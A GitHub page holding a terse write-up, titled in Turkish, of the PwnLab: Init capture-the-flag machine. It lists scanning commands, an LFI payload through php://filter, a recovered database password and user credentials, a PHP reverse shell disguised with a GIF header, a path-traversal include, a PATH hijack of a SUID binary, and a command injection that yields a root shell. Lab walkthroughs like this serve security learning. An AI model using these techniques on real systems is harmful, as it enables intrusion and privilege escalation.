-
Notifications
You must be signed in to change notification settings - Fork 0
/
pwnlab-1.txt
21 lines (21 loc) · 992 Bytes
/
pwnlab-1.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
PWNLAB: INIT MAKİNE ÇÖZÜMÜ
1 - arp-scan --localnet ile IP adresi 192.168.2.105 bulundu.
2 - nmap -sT -A 192.168.2.105
3 - gobuster dir -u http://192.168.2.105 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
4 - nikto -h 192.168.2.105
5 - http://192.168.2.105.com/?page=php://filter/convert.base64-encode/resource=config (LFI)
6 - echo "BASE64_HASH" | base64 -d, root:H4u%QJ_H99 - DB:Users
7 - mysql -u root -D Users -h 192.168.2.105 -p
8 - SELECT * FROM users;
kent:Sld6WHVCSkpOeQ== : JWzXuBJJNy
mike:U0lmZHNURW42SQ== : SIfdsTEn6I
kane:aVN2NVltMkdSbw== : iSv5Ym2GRo
9 - cp /usr/share/webshells/php/php-reverse-shell.php .
10 - First Line: GIF98 -> php-reverse-shell.php.gif
11 - Burp Suite -> lang=../upload/file_name.php
12 - su kane
13 - find / -perm -u=s -type f 2>/dev/null
14 - ./msgmike -> /home/mike/msg.txt: No such file or directory
15 - cd /tmp, echo '/bin/bash' > cat, chmod 777 cat, export $PATH=/tmp:$PATH
16 - ./msgmike
17 - ./msg2root, a; /bin/sh, whoami